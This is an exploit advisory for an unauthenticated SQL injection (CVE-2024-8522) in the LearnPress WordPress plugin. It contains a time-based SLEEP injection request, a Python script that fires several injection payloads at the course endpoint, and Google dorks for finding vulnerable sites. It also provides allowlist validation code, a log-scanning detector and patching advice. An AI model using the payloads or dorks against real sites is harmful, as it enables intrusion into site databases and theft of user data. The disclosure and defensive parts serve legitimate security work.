# Exploit Title: LearnPress WordPress LMS Plugin 4.2.7 - SQL Injection
# Google Dork: inurl:"/wp-json/learnpress/v1/" OR inurl:"/wp-content/plugins/learnpress/" OR "powered by LearnPress" AND "version 4.2.7"
# Date: [Current Date, e.g., October 30, 2024]
# Exploit Author: [Your Name or Username]
# Vendor Homepage: https://thimpress.com/learnpress/
# Software Link: https://wordpress.org/plugins/learnpress/
# Version: <= 4.2.7
# Tested on: WordPress 6.x, Ubuntu 22.04
# CVE: CVE-2024-8522

CVE-2024-8522 - SQL Injection in LearnPress WordPress Plugin (Python exploit)
Overview
CVE: CVE-2024-8522
Plugin: LearnPress – WordPress LMS Plugin (version <= 4.2.7)
Type: SQL Injection
Impact: High
Affected Component: Unauthenticated endpoint parameter c_only_fields in LearnPress API
Description
The vulnerability exists in the LearnPress WordPress plugin, versions up to 4.2.7. An unauthenticated SQL Injection flaw is present in the c_only_fields parameter of the LearnPress API endpoint. This flaw allows attackers to execute arbitrary SQL commands by manipulating API requests without authentication. If exploited, this could lead to unauthorized database access, potentially exposing sensitive data or even allowing administrative control through database manipulation.
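The root cause described above is a field-list parameter that reaches the query builder without being constrained to known column names. The following Python is an added illustration of the defensive check that prevents this class of flaw; it is not LearnPress's code, and the column names in ALLOWED_COURSE_FIELDS, the table name and the build_select helper are assumptions made for the example rather than the plugin's real schema or API. Each comma-separated entry must be a plain identifier and be present in an allowlist before it is quoted and placed in the SELECT; anything else, including the time-based payload from this advisory, is rejected before any SQL exists.

```python
import re

# Assumed allowlist of columns a caller may request. These names are
# illustrative placeholders, not LearnPress's real schema.
ALLOWED_COURSE_FIELDS = frozenset({"ID", "post_title", "post_name", "post_status", "post_date"})

# MySQL unquoted identifier characters (letters, digits, underscore, $).
_IDENT_RE = re.compile(r"^[A-Za-z0-9_$]+$")


class InvalidFieldError(ValueError):
    """Raised when a requested field is not on the allowlist."""


def parse_only_fields(raw, allowed=ALLOWED_COURSE_FIELDS):
    """Turn a raw c_only_fields value into a validated list of column names.

    Every comma-separated entry must be a bare identifier AND be present in
    the allowlist; function calls, parentheses, operators and unknown columns
    are rejected before any SQL is built. An empty value means 'all fields'.
    """
    if raw is None or raw.strip() == "":
        return []
    fields = []
    for entry in raw.split(","):
        name = entry.strip()
        if not _IDENT_RE.match(name) or name not in allowed:
            raise InvalidFieldError(f"field not allowed: {name!r}")
        if name not in fields:  # drop duplicates, keep caller's order
            fields.append(name)
    return fields


def build_select(raw_only_fields, table="wp_posts"):
    """Build the SELECT column list from validated names only (hypothetical helper).

    Identifiers are backtick-quoted; because the allowlist already excludes
    backticks and punctuation, no attacker-controlled text reaches the statement.
    """
    fields = parse_only_fields(raw_only_fields)
    columns = ", ".join(f"`{f}`" for f in fields) if fields else "*"
    return f"SELECT {columns} FROM `{table}`"


def is_safe_only_fields(raw):
    """Predicate usable as a pre-check (e.g. in a WAF rule): True if the value would be accepted."""
    try:
        parse_only_fields(raw)
        return True
    except InvalidFieldError:
        return False


if __name__ == "__main__":
    print(build_select("ID,post_title"))
    # The advisory's time-based payload is refused outright.
    print(is_safe_only_fields("IF(COUNT(*)!=-2,(SLEEP(10)),0)"))
```

The important design choice is that validation is positive (an allowlist of identifiers) rather than negative (blocking SLEEP, IF and similar tokens); a denylist would have to anticipate every MySQL function and operator, whereas an allowlist only ever admits names the application itself defined.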
Affected Code Path
The vulnerability is triggered by accessing the LearnPress API and injecting SQL commands through the c_only_fields parameter. The call chain leading to the vulnerable query (innermost frame first) is:
```plaintext
class-lp-db.php:702, LP_Database->execute()
class-lp-course-db.php:564, LP_Course_DB->get_courses()
Courses.php:241, LearnPress\Models\Courses::get_courses()
class-lp-rest-courses-v1-controller.php:502, LP_Jwt_Courses_V1_Controller->get_courses()
class-wp-rest-server.php:1230, WP_REST_Server->respond_to_request()
class-wp-rest-server.php:1063, WP_REST_Server->dispatch()
```
Proof of Concept (PoC)
The vulnerability can be demonstrated by sending a request to the API endpoint with a malicious payload in the c_only_fields parameter. Below is an example of an HTTP request that injects a conditional SQL expression and tests for the vulnerability by causing a time delay:
```http
GET /wp-json/learnpress/v1/courses?c_only_fields=IF(COUNT(*)!=-2,(SLEEP(10)),0) HTTP/1.1
Host: targetwebsite.com
User-Agent: curl/7.81.0
Accept: */*
```
Exploitation Script
The following Python script automates the process of sending malicious requests to test for this SQL injection vulnerability by measuring response time, indicating potential success if there is a delay.
```python
import requests
import time

# Target URL for the API endpoint
url = 'http://targetwebsite.com/wp-json/learnpress/v1/courses'

# SQL injection payloads
payloads = [
    "IF(COUNT(*) > 0, SLEEP(10), 0)",  # Test for successful injection
    "IF(1=1, SLEEP(10), 0)",           # Basic true condition
    "IF(1=2, SLEEP(10), 0)",           # Basic false condition
]

# Iterate over payloads and measure response time
for payload in payloads:
    params = {'c_only_fields': payload}
    start_time = time.time()  # Record start time
    try:
        # Send request to the endpoint; the timeout prevents the script from
        # hanging indefinitely if the server never answers
        response = requests.get(url, params=params, timeout=30)
        # Calculate response time
        response_time = time.time() - start_time
        # Display result
        print(f"Payload: {payload} | Status Code: {response.status_code} | Response Time: {response_time:.2f} seconds")
        # Check for delay indicative of a successful SQL injection
        if response_time > 10:
            print("Potential SQL Injection vulnerability detected (delay observed).")
        else:
            print("No delay observed; injection may be unsuccessful.")
    except requests.exceptions.RequestException as e:
        print(f"Error during request: {e}")
```
Google Dorks for Identifying Vulnerable Sites
To locate potentially vulnerable websites running LearnPress, the following Google dorks can help identify sites with the plugin:
inurl:"/wp-content/plugins/learnpress/"
inurl:"/wp-json/learnpress/v1/"
"powered by LearnPress" AND "version 4.2.7"
inurl:"/wp-content/plugins/learnpress/assets/js/"
"LearnPress" AND "WordPress LMS Plugin"
Disclaimer: Use of these dorks should only be conducted in an ethical manner, with proper permissions for testing on identified sites.
Impact Analysis
If exploited, this SQL Injection vulnerability can have severe impacts, including:
Data Breach: Unauthorized access to sensitive data within the WordPress database, such as user credentials, course data, and personal information.
Privilege Escalation: An attacker may leverage the SQL injection to modify database entries, potentially elevating user roles and gaining administrative access.
Site Defacement or Service Disruption: By altering content or database configurations, attackers can disrupt service availability or deface the website.
Recommendations
Immediate Update: Update the LearnPress plugin to a patched version when available.
Web Application Firewall (WAF): Employ a WAF that can filter and block malicious SQL injection attempts.
Least Privilege Access: Configure database users with the minimum necessary privileges to reduce potential impacts.
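Alongside updating and fronting the site with a WAF, administrators can look back through existing web-server logs for attempts against this endpoint. The Python below is an added example, not part of the original report: it parses Apache/Nginx combined-format access logs, URL-decodes the query string, and flags any request to /wp-json/learnpress/v1/ whose c_only_fields value contains SQL tokens or anything other than a comma-separated list of identifiers. The log lines in SAMPLE_LOG are constructed for the example (client addresses are documentation ranges, not real traffic); the same predicate can serve as the matching logic for a WAF rule on that parameter.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [30/Oct/2024:10:01:12 +0000] "GET /wp-json/learnpress/v1/courses?c_only_fields=ID,post_title HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [30/Oct/2024:10:01:40 +0000] "GET /wp-json/learnpress/v1/courses?c_only_fields=IF(COUNT(*)!%3D-2,(SLEEP(10)),0) HTTP/1.1" 200 78 "-" "curl/7.81.0"
203.0.113.9 - - [30/Oct/2024:10:02:03 +0000] "GET /wp-json/learnpress/v1/courses?c_only_fields=IF(1%3D1,%20SLEEP(10),%200) HTTP/1.1" 200 78 "-" "python-requests/2.31.0"
198.51.100.7 - - [30/Oct/2024:10:02:30 +0000] "GET /wp-content/plugins/learnpress/assets/js/app.js HTTP/1.1" 200 20480 "-" "Mozilla/5.0"
"""

# Combined log format: client, timestamp, request line, status code.
_LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# A legitimate field list is identifiers separated by commas (whitespace tolerated).
_LEGIT_FIELDS_RE = re.compile(r"^[A-Za-z0-9_$]+(\s*,\s*[A-Za-z0-9_$]+)*$")

# SQL tokens that have no business in a column-list parameter.
_SQL_TOKENS = ("SLEEP(", "BENCHMARK(", "IF(", "UNION", "SELECT", "--", "/*")


def classify_field_value(value):
    """Return a short reason the value looks like injection, or None if it looks legitimate."""
    upper = value.upper()
    for tok in _SQL_TOKENS:
        if tok in upper:
            return f"sql token {tok}"
    if not _LEGIT_FIELDS_RE.match(value.strip()):
        return "non-identifier characters"
    return None


def scan_log(text):
    """Return one finding per request whose c_only_fields value looks like SQL injection."""
    findings = []
    for line in text.splitlines():
        m = _LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip
        parts = urlsplit(m.group("target"))
        if not parts.path.startswith("/wp-json/learnpress/v1/"):
            continue  # only the LearnPress REST namespace is of interest
        # parse_qs URL-decodes values, so %3D becomes '=' and %20 becomes ' '.
        for value in parse_qs(parts.query).get("c_only_fields", []):
            reason = classify_field_value(value)
            if reason:
                findings.append({
                    "client": m.group("client"),
                    "time": m.group("ts"),
                    "status": m.group("status"),
                    "value": value,
                    "reason": reason,
                })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['client']} {f['reason']}: {f['value']}")
```

Run against the sample, the scanner reports the two requests from 203.0.113.9 and ignores the legitimate field list and the static-asset request. Because the detection decodes the query string before matching, percent-encoded variants of the same payload are caught as well; a WAF rule that inspects only the raw URL would miss them.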
Conclusion
The SQL Injection vulnerability in LearnPress (<= 4.2.7) is a high-severity issue that exposes affected WordPress sites to data breaches, privilege escalation, and potential service disruption. It is crucial for site administrators using this plugin to update to a secure version and implement protective measures.
This report summarizes the vulnerability, exploitation methods, and recommendations to mitigate risks associated with CVE-2024-8522.